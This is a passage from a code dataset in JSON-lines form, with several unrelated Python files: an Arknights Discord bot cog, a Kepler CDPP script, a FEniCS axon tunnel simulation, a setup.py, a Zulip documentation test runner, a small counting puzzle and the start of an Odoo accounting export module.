{info[\"slProgress\"]}%'\n embed.add_field(name=\"General Information\",\n value=general, inline=False)\n\n # Challenge Mode info\n if info[\"hardStagedId\"] is not None:\n challenge_mode = arknights.get_stage(info[\"hardStagedId\"])[0]\n challenge_general = \"\"\n if len(challenge_mode[\"unlockCondition\"]) > 0:\n unlock_condition = [\n f'{\"Clear\" if st[\"completeState\"] == 2 else \"Perfect\"} **{arknights.get_stage(st[\"stageId\"])[0][\"code\"]}**' for st in challenge_mode[\"unlockCondition\"]]\n challenge_general += f'• Unlock Conditions : {\", \".join(unlock_condition)}'\n challenge_description = pattern.sub(\n r\"**\\1**\", challenge_mode[\"description\"])\n embed.add_field(name=\"Challenge Mode Information\",\n value=f'{challenge_description}\\n{challenge_general}', inline=False)\n\n # Map info\n extra_options = extra_info[\"options\"]\n stage_info = f'• Deployment Limit : {extra_options[\"characterLimit\"]}\\n• Life Points : {extra_options[\"maxLifePoint\"]}\\n• Initial DP : {extra_options[\"initialCost\"]}'\n embed.add_field(name=\"Map Information\", value=stage_info, inline=False)\n\n # Enemies info\n # Count enemies by extracting waves\n # I can't really find a better way to do this, maybe the database is missing some parts ?\n enemies_waves = extra_info[\"waves\"]\n enemies_count = {}\n for wave in enemies_waves:\n for fragment in wave[\"fragments\"]:\n for action in fragment[\"actions\"]:\n if action[\"actionType\"] == 0:\n enemy = arknights.get_enemy(action[\"key\"])\n if enemy[\"name\"] not in enemies_count:\n enemies_count[enemy[\"name\"]] = {\n \"sort\": enemy[\"sortId\"],\n \"count\": 0\n }\n enemies_count[enemy[\"name\"]\n ][\"count\"] += action[\"count\"]\n enemies_count = {k: v for k, v in sorted(\n enemies_count.items(), key=lambda item: item[1][\"sort\"])}\n embed.add_field(name=\"Enemies\", value=\"\\n\".join(\n [f'• {enemy[1][\"count\"]}x {enemy[0]}' for enemy in enemies_count.items()]), inline=False)\n\n # Filter Originite Prime\n first = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 8 # First clear item (Originite Prime)\n ]\n ]\n # Filter items\n first.extend(\n [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 1 # First clear (others)\n and y[\"type\"] != \"TKT_RECRUIT\" # Operator\n and y[\"type\"] != \"FURN\" # Furniture\n ]\n ]\n )\n # Filter operator\n first.extend(\n [\n f'• {x[\"name\"]}'\n for x in [\n arknights.get_operator_info(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 1 and y[\"type\"] == \"TKT_RECRUIT\" # Operator\n ]\n ]\n )\n # Filter furniture\n first.extend(\n [\n f'• {x[\"name\"]}'\n for x in [\n arknights.get_furniture(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 1 and y[\"type\"] == \"FURN\" # Furniture\n ]\n ]\n )\n # Always check for length\n if len(first) > 0:\n embed.add_field(\n name=\"First Clear\",\n value=\"\\n\".join(first),\n inline=False)\n\n # Filter regular drops\n regular = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 2 # Fixed\n ]\n ]\n # Always check for length\n if len(regular) > 0:\n embed.add_field(\n name=\"Regular Drops\", value=\"\\n\".join(regular), inline=False\n )\n\n # Filter special drops\n special = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayRewards\"]\n if y[\"dropType\"] == 3 # Special Drops\n ]\n ]\n # Always check for length\n if len(special) > 0:\n embed.add_field(\n name=\"Special Drops\", value=\"\\n\".join(special), inline=False\n )\n\n # Filter extra drops\n extra = [\n f'• {x[\"name\"]} (`{x[\"itemId\"]}`)'\n for x in [\n arknights.get_item(y[\"id\"])\n for y in info[\"stageDropInfo\"][\"displayDetailRewards\"]\n if y[\"dropType\"] == 4 # Extra Drops\n ]\n ]\n # Always check for length\n if len(extra) > 0:\n embed.add_field(\n name=\"Extra Drops (Small Chance)\",\n value=\"\\n\".join(extra),\n inline=False)\n\n # Annihilatio\n if anni_info is not None:\n # First clear rewards\n first_clear = anni_info[\"breakLadders\"]\n endl = \"\\n\" # Backslashes may not appear inside the expression portions of f-strings\n embed.add_field(name=\"First Clear\", value=endl.join(\n [f'''**{ladder[\"killCnt\"]}** kills\\n{endl.join([f\"• {reward['count']} {arknights.get_item(reward['id'])['name']} (`{reward['id']}`)\" for reward in ladder[\"rewards\"]])}{f\"{endl}• Weekly Orundum Reward Limit : +{ladder['breakFeeAdd']}\" if ladder[\"breakFeeAdd\"] > 0 else \"\"}''' for ladder in first_clear]), inline=False)\n # Sanity Return Rule\n gain_ladder = anni_info[\"gainLadders\"]\n embed.add_field(name=\"Sanity Return Rule\", value=\"\\n\".join(\n [f'**{ladder[\"killCnt\"]}** kills\\n• Sanity Refund : {ladder[\"apFailReturn\"]}\\n• EXP Gain : {ladder[\"expGain\"]}\\n• LMD Gain : {ladder[\"goldGain\"]}\\n• Favor Gain : {ladder[\"favor\"]}' for ladder in gain_ladder]), inline=False)\n\n # Unreliable image source\n # https://gamepress.gg/arknights/database/combat-operation-list\n embed.set_image(\n url=f'https://gamepress.gg/arknights/sites/arknights/files/game-images/mission_maps/{info[\"stageId\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows infos of an item\", usage=\"[item]\")\n async def item(self, ctx, *, item=None):\n \"\"\"\n Detailed information of an item\n\n E.g: ;info Originite Prime\n \"\"\"\n\n if item is None:\n raise GeneralCogError(\"You need to provide an item name!\")\n\n # Get item info\n info = arknights.get_item(item)\n\n embed = Embed(\n title=f'{info[\"name\"]} (`{info[\"itemId\"]}`)',\n description=f'{info[\"usage\"]}\\n_{info[\"description\"]}_\\n**Rarity** : {\"☆\" * (info[\"rarity\"] + 1)}\\n**How to obtain** : {info[\"obtainApproach\"] or \"\"}',\n )\n\n # Get stages in stage drop list\n # stages = [\n # f'• **[{x[\"code\"]}]** {x[\"name\"]}{\" (Challenge Mode)\" if x[\"difficulty\"] == \"FOUR_STAR\" else \"\"} [{constants.OCCURRENCE[y[\"occPer\"]]}]'\n # for x, y in [\n # (arknights.get_stage(y[\"stageId\"])[0], y) for y in info[\"stageDropList\"]\n # ]\n # ]\n\n # Get stages directly\n stages = [\n f'• **[{x[\"code\"]}]** {x[\"name\"]}{\" (Challenge Mode)\" if x[\"difficulty\"] == \"FOUR_STAR\" else \"\"} [{constants.DROP_TYPE[y][1 if info[\"rarity\"] > 1 and y == 2 else 0]}]'\n for x, y in arknights.get_stage_with_item(\n info[\"itemId\"]\n ) # Get stage list with item\n if y != 4 # Don't get stage where item is extra drop\n ]\n if len(\n stages) > 0 and info[\"itemId\"] != \"4002\": # Filter Originite Prime\n embed.add_field(name=\"Stages\", value=\"\\n\".join(stages))\n\n # If item can be produced in base\n base = [\n f'• {x[\"roomType\"].title()}' for x in info[\"buildingProductList\"]]\n # Always check for length\n if len(base) > 0:\n embed.add_field(name=\"Base production\", value=\"\\n\".join(base))\n\n # Get item image from\n # https://github.com/Aceship/AN-EN-Tags/tree/master/img\n embed.set_thumbnail(\n url=f'https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/img/items/{info[\"iconId\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows infos of a furniture\", usage=\"[furniture]\")\n async def furniture(self, ctx, *, furniture=None):\n \"\"\"\n Detailed infos of a furniture\n\n E.g: ;furniture Rabbit-like Bean Bag Sofa\n \"\"\"\n\n if furniture is None:\n raise GeneralCogError(\"You need to provide a furniture name!\")\n\n # Get furniture info\n info = arknights.get_furniture(furniture)\n embed = Embed(\n title=info[\"name\"],\n description=f'{info[\"usage\"]}\\n_{info[\"description\"]}_\\n**Rarity** : {\"☆\" * (info[\"rarity\"] + 1)}\\n**How to obtain** : {info[\"obtainApproach\"] or \"\"}',\n )\n\n # Grab general\n general = f'• Type : {info[\"type\"].title()}\\n• Location : {info[\"location\"].title()}\\n• Category : {info[\"category\"].title()}'\n embed.add_field(name=\"Details\", value=general, inline=False)\n\n # Add measurements\n measurements = f'• Width : {info[\"width\"]}\\n• Depth : {info[\"depth\"]}\\n• Height : {info[\"height\"]}\\n• Ambience : {info[\"comfort\"]}'\n embed.add_field(name=\"Measurements\", value=measurements, inline=False)\n\n # Get furniture image from\n # https://github.com/Aceship/AN-EN-Tags/tree/master/img\n embed.set_thumbnail(\n url=f'https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/img/furniture/{info[\"id\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows infos of an enemy\", usage=\"[enemy]\")\n async def enemy(self, ctx, *, enemy=None):\n \"\"\"\n Detailed infos of an enemy\n\n E.g: ;enemy FrostNova\n \"\"\"\n\n if enemy is None:\n raise GeneralCogError(\"You need to provide an enemy name!\")\n\n # Get enemy info\n info = arknights.get_enemy(enemy)\n\n description = \"\"\n # Enemy races: Infected Creature, Sarkaz, etc\n if info[\"enemyRace\"] is not None:\n description += f'**Race** : {info[\"enemyRace\"] or \"???\"}\\n'\n # Attack types: Melee, Ranged, Ranged Arts, etc\n description += f'''**Attack** : {info[\"attackType\"]}\\n{info[\"description\"]}'''\n embed = Embed(\n title=f'[{info[\"enemyIndex\"]}] {info[\"name\"]}',\n description=description)\n\n # Stats\n embed.add_field(\n name=\"Stats\",\n value=f'• HP : {info[\"endure\"]}\\n• ATK : {info[\"attack\"]}\\n• DEF : {info[\"defence\"]}\\n• RES : {info[\"resistance\"]}',\n inline=False,\n )\n\n # Ability: \"Upon death, deals large physical damage in an area\", etc\n if info[\"ability\"] is not None:\n embed.add_field(\n name=\"Ability\",\n value=info[\"ability\"],\n inline=False)\n\n # Get enemy image from\n # https://github.com/Aceship/AN-EN-Tags/tree/master/img\n embed.set_thumbnail(\n url=f'https://raw.githubusercontent.com/Aceship/AN-EN-Tags/master/img/enemy/{info[\"enemyId\"]}.png')\n\n await ctx.send(embed=embed)\n\n @commands.command(\n brief=\"Shows which operators you can get with which tags\",\n usage=\"[tags]\")\n async def recruit(self, ctx, *tags):\n \"\"\"\n Shows which operators you can get with which recruitment tags\n Multi-word tags have to be quoted\n\n E.g: ;operator tag Defense Melee \"Crowd Control\" \"Top Operator\" \"Senior Operator\"\n \"\"\"\n\n tags = list(tags)\n # Check number of tags\n if len(tags) == 0 or len(tags) > 5:\n raise GeneralCogError(\n \"You have to provide at least 1 tag and at most 5 tags!\"\n )\n # Check for invalid tags\n if set(tags).issubset(constants.TAG_LIST) is False:\n raise GeneralCogError(\n f'Tag must be one of {\", \".join(constants.TAG_LIST)}')\n\n # Generate tag combinations\n tags_combi = [\n combi\n for combi_list in [\n [list(x) for x in combinations(tags, i)] for i in range(1, 4)\n ]\n for combi in combi_list\n ][::-1]\n\n # Create a match table\n match_table = [[] for i in range(len(tags_combi))]\n embed = Embed()\n # Get operator list\n operator_list = arknights.get_operator_by_tags(\n [x.lower() for x in tags])\n\n for (tag_combi, match_list) in zip(tags_combi, match_table):\n # Adding operators\n match_list.extend(\n [\n (operator[\"name\"], operator[\"rarity\"] + 1)\n for operator in operator_list\n # Check if operator tag list has tag combinations\n if (set(tag_combi).issubset(set(operator[\"tagList\"])))\n # Only show 6* if \"Top Operator\" is in query\n and not (\n \"Top Operator\" not in tags\n and \"Top Operator\" in operator[\"tagList\"]\n )\n ][::-1]\n )\n\n # If match found\n if len(match_list) > 0:\n embed.add_field(\n name=\" \".join(tag_combi),\n value=f'{\" \".join([f\"`[{op[1]}☆] {op[0]}`\" for op in match_list])}',\n inline=False,\n )\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Shows some tips\", usage=\"[category]\")\n async def tip(self, ctx, *, category=None):\n \"\"\"\n Display a random (useful) tips\n \"\"\"\n\n # Category list to filter\n categories = [\"BATTLE\", \"BUILDING\", \"GACHA\", \"MISC\"]\n # Filter invalid category\n if category.upper() not in categories if category is not None else True:\n raise GeneralCogError(\n f'Category must be one of {\", \".join([x.title() for x in categories])}'\n )\n\n # Get random tip\n info = arknights.get_tips(category)\n\n embed = Embed(description=f'**[{info[\"category\"]}]** {info[\"tip\"]}.')\n\n await ctx.send(embed=embed)\n\n @discord_common.send_error_if(GeneralCogError)\n async def cog_command_error(self, ctx, error):\n logging.exception(error)\n pass\n\n\ndef setup(bot):\n bot.add_cog(General(bot))\n","sub_path":"amiya/cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":17396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204956028","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nkepler_cdpp.py\n--------------\n\nComputes the raw 6-hr CDPP for all original `Kepler` targets.\n\n..warning:: This was copied over from an older version, and may need to be tweaked slightly.\n\n'''\n\nfrom __future__ import division, print_function, absolute_import, unicode_literals\nimport os, sys\nEVEREST_ROOT = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.insert(1, EVEREST_ROOT)\nimport everest\nfrom everest.utils import RMS\nimport kplr\nfrom kplr.config import KPLR_ROOT\nimport random\nimport numpy as np\nimport shutil\nimport subprocess\nimport warnings\nfrom urllib.error import HTTPError\nfrom scipy.signal import savgol_filter\n\n# Start up kplr\nclient = kplr.API()\n\n# Get all stars\nstars = list(np.loadtxt(os.path.join(EVEREST_ROOT, 'tables', 'keplerstars.csv'), dtype = int)) \nnstars = len(stars)\n\n# Remove ones we've done\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n done = np.loadtxt(os.path.join('CDPP', 'kepler.tsv'), dtype = float)\nif len(done):\n done = [int(s) for s in done[:,0]]\nstars = list(set(stars) - set(done))\nn = len(done) + 1\n\n# Open the output file\nwith open(os.path.join('CDPP', 'kepler.tsv'), 'a') as outfile:\n\n # Loop over all to get the CDPP\n for star in stars:\n\n # Progress\n sys.stdout.write('\\rRunning target %d/%d...' % (n, nstars))\n sys.stdout.flush()\n n += 1\n \n # Get the cdpp\n try:\n s = kplr.K2SFF(star)\n except (HTTPError, TypeError, ValueError):\n continue\n \n # Get a random quarter\n lc = random.choice(s.get_light_curves(short_cadence = False))\n \n # Extract the timeseries\n with lc.open() as infile:\n time = infile[1].data.field('TIME')\n flux = infile[1].data.field('SAP_FLUX')\n bad = np.where(np.isnan(time) | np.isnan(flux))\n time = np.delete(time, bad)\n flux = np.delete(flux, bad)\n \n rms = RMS(flux / np.median(flux), remove_outliers = True)\n flux_sv2 = flux - savgol_filter(flux, 49, 2) + np.median(flux)\n rms_sv2 = RMS(flux_sv2 / np.nanmedian(flux_sv2), remove_outliers = True) \n print(\"{:>09d} {:>15.3f} {:>15.3f}\".format(star, rms, rms_sv2), file = outfile)\n \n # Delete the lightcurve on disk\n shutil.rmtree(os.path.join(kplr.config.KPLR_ROOT, 'data', 'lightcurves', '%09d' % star))","sub_path":"paper/scripts/kepler_cdpp.py","file_name":"kepler_cdpp.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409273501","text":"import os\nfrom os.path import join\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"AGG\")\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport dolfin as df\n\neps = 1e-9\n\n# Define set up, corresponding semi infinite homogeneous conductor, to be compared to known analytic solution\ndx_tunnel = 100.0 # um\ndy_tunnel = 100.0\ndz_tunnel = 100.0\n\nx0 = -dx_tunnel / 2\ny0 = -dy_tunnel / 2\nz0 = 0.0\n\nx1 = x0 + dx_tunnel\ny1 = y0 + dy_tunnel\nz1 = z0 + dz_tunnel\n\nnx = 50 # Number of points in mesh. Larger number gives more accuracy, but is computationally demanding\nny = 50\nnz = 50\n\nsigma = 0.3 # Extracellular conductivity (S/m)\n\n\nout_folder = 'results_control'\nsim_name = \"tunnel_test\"\nfem_fig_folder = \"fem_figs_control\"\n[os.makedirs(f, exist_ok=True) for f in [out_folder, fem_fig_folder]]\n\n# example values for validation\nsource_pos = np.array([[-5, 0, 5],\n [5, 0, 5]])\nimem = np.array([[-1.0], [1.0]])\ntvec = np.array([0.])\nnum_tsteps = imem.shape[1]\nnum_sources = source_pos.shape[0]\n\n\ndef analytic_mea(x, y, z):\n phi = 0\n for idx in range(len(imem)):\n r = np.sqrt((x - source_pos[idx, 0])**2 +\n (y - source_pos[idx, 1])**2 +\n (z - source_pos[idx, 2])**2)\n phi += imem[idx] / (2 * sigma * np.pi * r)\n return phi\n\n\ndef plot_FEM_results(phi, t_idx):\n \"\"\" Plot the set-up, transmembrane currents and electric potential\n \"\"\"\n\n x = np.linspace(x0, x1, nx)\n z = np.linspace(z0, z1, nz)\n y = np.linspace(y0, y1, nz)\n\n mea_x_values = np.zeros(len(x))\n analytic = np.zeros(len(x))\n for idx in range(len(x)):\n mea_x_values[idx] = phi(x[idx], 0, eps)\n analytic[idx] = analytic_mea(x[idx], 0, 1e-9)\n\n phi_plane_xz = np.zeros((len(x), len(z)))\n phi_plane_xy = np.zeros((len(x), len(z)))\n for x_idx in range(len(x)):\n for z_idx in range(len(z)):\n phi_plane_xz[x_idx, z_idx] = phi(x[x_idx], 0.0, z[z_idx])\n for y_idx in range(len(y)):\n phi_plane_xy[x_idx, y_idx] = phi(x[x_idx], y[y_idx], 0.0 + eps)\n\n plt.close(\"all\")\n fig = plt.figure(figsize=[18, 9])\n fig.subplots_adjust(hspace=0.9, bottom=0.07, top=0.97, left=0.2)\n\n ax_setup = fig.add_subplot(511, aspect=1, xlabel='x [$\\mu$m]', ylabel='z [$\\mu$m]',\n title='Axon (green) and tunnel (gray)', xlim=[x0 - 5, x1 + 5], ylim=[z0 - 5, z1 + 5])\n\n axon_center_idx = np.argmin(np.abs(source_pos[:, 0] - 0))\n\n imem_max = np.max(np.abs(imem))\n ax_imem_temporal = fig.add_axes([0.05, 0.8, 0.08, 0.1], xlabel='Time [ms]', ylabel='nA',\n xlim=[0, tvec[-1]], ylim=[-imem_max, imem_max],\n title='Transmembrane currents\\n(x=0)')\n\n ax_imem_spatial = fig.add_subplot(512, xlabel=r'x [$\\mu$m]', ylabel='nA',\n ylim=[-imem_max - 1, imem_max + 1],\n title='Transmembrane currents across axon', xlim=[x0 - 5, x1 + 5])\n\n ax1 = fig.add_subplot(513, aspect=1, xlabel=r'x [$\\mu$m]', ylabel=r'y [$\\mu$m]',\n title='Potential cross section (z=0)')\n\n ax2 = fig.add_subplot(514, aspect=1, xlabel=r'x [$\\mu$m]', ylabel=r'z [$\\mu$m]',\n title='Potential cross section (y=0)')\n\n ax3 = fig.add_subplot(515, xlabel=r'x [$\\mu$m]', ylabel='MEA potential (mV)',\n xlim=[x0 - 5, x1 + 5])\n\n # Draw set up with tunnel and axon\n rect = mpatches.Rectangle([x0, z0], dx_tunnel, dz_tunnel, ec=\"k\", fc='0.8')\n ax_setup.add_patch(rect)\n\n ax_setup.plot(source_pos[:, 0], source_pos[:, 2], c='g', lw=2)\n ax_imem_temporal.plot(tvec, imem[axon_center_idx, :])\n ax_imem_temporal.axvline(tvec[t_idx], c='gray', ls=\"--\")\n\n ax_imem_spatial.plot(source_pos[:, 0], imem[:, t_idx])\n\n img1 = ax1.imshow(phi_plane_xy.T, interpolation='nearest', origin='lower', cmap='bwr',\n extent=(x[0], x[-1], y[0], y[-1]))\n img2 = ax2.imshow(phi_plane_xz.T, interpolation='nearest', origin='lower', cmap='bwr',\n extent=(x[0], x[-1], z[0], z[-1]))\n\n cax = fig.add_axes([0.95, 0.5, 0.01, 0.1])\n\n plt.colorbar(img1, cax=cax, label=\"mV\")\n l, = ax3.plot(x, mea_x_values, lw=2, c='k')\n la, = ax3.plot(x, analytic, lw=1, c='r', ls=\"--\")\n fig.legend([l, la], [\"FEM\", \"Analytic semi-infinite\"], frameon=False)\n plt.savefig(join(fem_fig_folder, 'results_{}_t_idx_{}.png'.format(sim_name, t_idx)))\n\n\ndef refine_mesh(mesh):\n \"\"\"\" To refine selected parts of the mesh. \"\"\"\n for r in [2.5]:#[20, 15, 10, 8]:\n print(\"Refining ...\")\n cell_markers = df.MeshFunction(\"bool\", mesh, dim=mesh.topology().dim()-1)\n cell_markers.set_all(False)\n for cell in df.cells(mesh):\n # p = np.sum(np.array(cell.midpoint()[:])**2)\n if np.abs(cell.midpoint()[2]) < r:\n cell_markers[cell] = True\n mesh = df.refine(mesh, cell_markers)\n\n print(mesh.num_cells())\n mesh.smooth()\n return mesh\n\n\n# Create classes for defining parts of the boundaries and the interior\n# of the domain\nclass LeftTunnel(df.SubDomain):\n def inside(self, x, on_boundary):\n return df.near(x[0], x0)\n\n\nclass RightTunnel(df.SubDomain):\n def inside(self, x, on_boundary):\n return df.near(x[0], x1)\n\n\n# Initialize sub-domain instances\nleft = LeftTunnel()\nright = RightTunnel()\n\n# Define mesh\nmesh = df.BoxMesh(df.Point(x0, y0, z0), df.Point(x1, y1, z1), nx, ny, nz)\n\nprint(\"Number of cells in mesh: \", mesh.num_cells())\n# mesh = refine_mesh(mesh)\n\nnp.save(join(out_folder, \"mesh_coordinates.npy\"), mesh.coordinates())\n\n\n# Initialize mesh function for interior domains\ndomains = df.MeshFunction(\"size_t\", mesh, mesh.topology().dim())\ndomains.set_all(0)\n\n# Initialize mesh function for boundary domains.\nboundaries = df.MeshFunction(\"size_t\", mesh, mesh.topology().dim()-1)\nboundaries.set_all(0)\nleft.mark(boundaries, 1) # Mark ends of tunnel to enforce ground\nright.mark(boundaries, 1)\n\n\nV = df.FunctionSpace(mesh, \"CG\", 2)\nds = df.Measure(\"ds\", domain=mesh, subdomain_data=boundaries)\ndx = df.Measure(\"dx\", domain=mesh, subdomain_data=domains)\n\nv = df.TestFunction(V)\nu = df.TrialFunction(V)\na = df.inner(sigma * df.grad(u), df.grad(v)) * dx\n# Define function space and basis functions\n\n# This corresponds to Neumann boundary conditions zero, i.e. all outer boundaries are insulating.\nL = df.Constant(0) * v * dx\n\n# Define Dirichlet boundary conditions at left and right boundaries\nbcs = [df.DirichletBC(V, 0.0, boundaries, 1)]\n\n\nfor t_idx in range(num_tsteps):\n\n print(\"Time step {} of {}\".format(t_idx, num_tsteps))\n phi = df.Function(V)\n A = df.assemble(a)\n b = df.assemble(L)\n\n [bc.apply(A, b) for bc in bcs]\n\n # Adding point sources from neural simulation\n for s_idx, s_pos in enumerate(source_pos):\n\n point = df.Point(s_pos[0], s_pos[1], s_pos[2])\n delta = df.PointSource(V, point, imem[s_idx, t_idx])\n delta.apply(b)\n\n df.solve(A, phi.vector(), b, 'cg', \"ilu\")\n\n # df.File(join(out_folder, \"phi_t_vec_{}.xml\".format(t_idx))) << phi\n np.save(join(out_folder, \"phi_t_vec_{}.npy\".format(t_idx)), phi.vector())\n\n plot_FEM_results(phi, t_idx)\n\n\n","sub_path":"axon_tunnel_FEM_control_simulation.py","file_name":"axon_tunnel_FEM_control_simulation.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246128381","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n Setup file for PyScaffold.\n\n Important note: Since PyScaffold is self-using and depends on\n setuptools-scm, it is important to run `python setup.py egg_info` after\n a fresh checkout. This will generate some critically needed data.\n\"\"\"\n\nimport inspect\nimport os\nimport sys\n\nfrom setuptools import setup\n\n__author__ = \"Florian Wilhelm\"\n__copyright__ = \"Blue Yonder\"\n__license__ = \"new BSD\"\n__location__ = os.path.join(os.getcwd(), os.path.dirname(\n inspect.getfile(inspect.currentframe())))\n\n\ndef setup_package():\n needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)\n sphinx = ['sphinx'] if needs_sphinx else []\n setup(setup_requires=['six', 'pyscaffold>=2.5a0,<2.6a0'] + sphinx,\n use_pyscaffold=True)\n\n\nif __name__ == '__main__':\n setup_package()\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"269765909","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport optparse\nimport os\nimport sys\nimport subprocess\n\nimport time\n\ntry:\n # We don't actually need typing, but it's a good guard for being\n # outside a Zulip virtualenv.\n from typing import Iterable\n import requests\nexcept ImportError as e:\n print(\"ImportError: {}\".format(e))\n print(\"You need to run the Zulip tests inside a Zulip dev environment.\")\n print(\"If you are using Vagrant, you can `vagrant ssh` to enter the Vagrant guest.\")\n sys.exit(1)\n\nos.environ[\"EXTERNAL_HOST\"] = \"localhost:9981\"\n\nparser = optparse.OptionParser()\nparser.add_option('--force', default=False,\n action=\"store_true\",\n help='Run tests despite possible problems.')\n(options, args) = parser.parse_args()\n\ndef assert_server_running(server):\n # type: (subprocess.Popen) -> None\n \"\"\"Get the exit code of the server, or None if it is still running.\"\"\"\n if server.poll() is not None:\n raise RuntimeError('Server died unexpectedly! Check %s' % (LOG_FILE,))\n\n\ndef server_is_up(server):\n # type: (subprocess.Popen) -> bool\n assert_server_running(server)\n try:\n # We could get a 501 error if the reverse proxy is up but the Django app isn't.\n return requests.get('http://127.0.0.1:9981/accounts/home').status_code == 200\n except:\n return False\n\n\nsubprocess.check_call(['mkdir', '-p', 'var/help-documentation'])\n\nLOG_FILE = 'var/help-documentation/server.log'\nif os.path.exists(LOG_FILE) and os.path.getsize(LOG_FILE) < 100000:\n log = open(LOG_FILE, 'a')\n log.write('\\n\\n')\nelse:\n log = open(LOG_FILE, 'w')\n\nrun_dev_server_command = ['tools/run-dev.py', '--test']\nif options.force:\n run_dev_server_command.append('--force')\nserver = subprocess.Popen(run_dev_server_command, stdout=log, stderr=log)\n\nsys.stdout.write('Waiting for test server')\ntry:\n while not server_is_up(server):\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\n')\n\n ret = subprocess.call(('scrapy', 'crawl_with_status', 'help_documentation_crawler'),\n cwd='tools/documentation_crawler')\nfinally:\n assert_server_running(server)\n server.terminate()\n\nif ret != 0:\n print(\"\\033[0;91m\")\n print(\"Failed\")\n print(\"\\033[0m\")\nelse:\n print(\"\\033[0;92m\")\n print(\"Passed!\")\n print(\"\\033[0m\")\n\n\nsys.exit(ret)\n","sub_path":"tools/test-help-documentation.py","file_name":"test-help-documentation.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523044164","text":"# 舉例:\n# 現在王老先生看到5個頭,14只脚,\n# 所以雞就有3只,兔子有2只。\n# 如果王老先生看到的數量無解,就輸出 \"NO\"\n\nnm = input().split()\nn = int(nm[0])\nm = int(nm[1])\n\nif (m % 2 == 0) & (n * 2 <= m) & (n * 4 >= m) :\n \n print(\"YES\")\n\n r = int((m - (n * 2)) / 2)\n c = n - r\n print(c, r)\n \nelse :\n print(\"NO\")","sub_path":"1201-雞兔同籠.py","file_name":"1201-雞兔同籠.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356763047","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, api\n\nfrom pyimppn import imppn_line\nimport psycopg2\nimport os\n\nclass company_imppn(models.Model):\n _inherit = 'res.company'\n\n x_teamsystem_id = fields.Integer(string='Teamsystem id')\n\n\nclass odoo_imppn(models.Model):\n _name = 'odoo_imppn.odoo_imppn'\n # name = fields.Char(required=True,default='Click on button!')\n \n @api.multi\n def test_text_file(self):\n results = \"this is a test to see if we are able to write on a text file located inside the module\\n\"\n path = os.path.expanduser('./etc/odoo/addons/odoo_imppn/IMPPN.txt')\n # fileIMPPN = open(os.path.join(os.path.dirname(__file__), 'IMPPN.txt'), 'r+') \n fileIMPPN = open(path, 'a')\n fileIMPPN.write(results)\n fileIMPPN.close()\n\n @api.multi\n def select_form_account_invoice(self):\n postgresql = \"SELECT res_company.x_teamsystem_id, res_partner.name FROM res_company, account_invoice, res_partner \" \\\n \" WHERE res_partner.id = account_invoice.partner_id AND res_company.id = 1 ;\"\n cnx = None\n try:\n # Connecting python postgresql database\n cnx = psycopg2.connect(host=\"172.17.0.2\", port=5432, user=\"odoo\", password=\"odoo\", dbname=\"db\")\n # Creating a cursor object to interact with mysql db and assign it to a variable cursor\n cur = cnx.cursor()\n # Execute statement or query on db\n cur.execute(postgresql)\n # Fetch all rows of the query executed\n results = cur.fetchall()\n # close communication with the database\n cur.close()\n return results\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if cnx is not None:\n cnx.close()\n \n @api.multi\n def import_accounting(self):\n result = self.select_form_account_invoice()\n for i in range(len(result)):\n result_string = imppn_line(\n TRF_DITTA=str(result[i][0]),\n TRF_VERSIONE=\"3\",\n TRF_TARC=\"0\",\n TRF_COD_CLIFOR=\"\",\n TRF_RASO=str(result[i][1]),\n TRF_IND=\"Via Roma, 44\",\n TRF_CAP=\"19100\",\n TRF_CITTA=\"La Spezia\",\n TRF_PROV=\"SP\",\n TRF_COFI=\"\",\n TRF_PIVA=\"00468990015\",\n TRF_PF=\"N\",\n TRF_DIVIDE=\"\",\n TRF_PAESE=\"\",\n 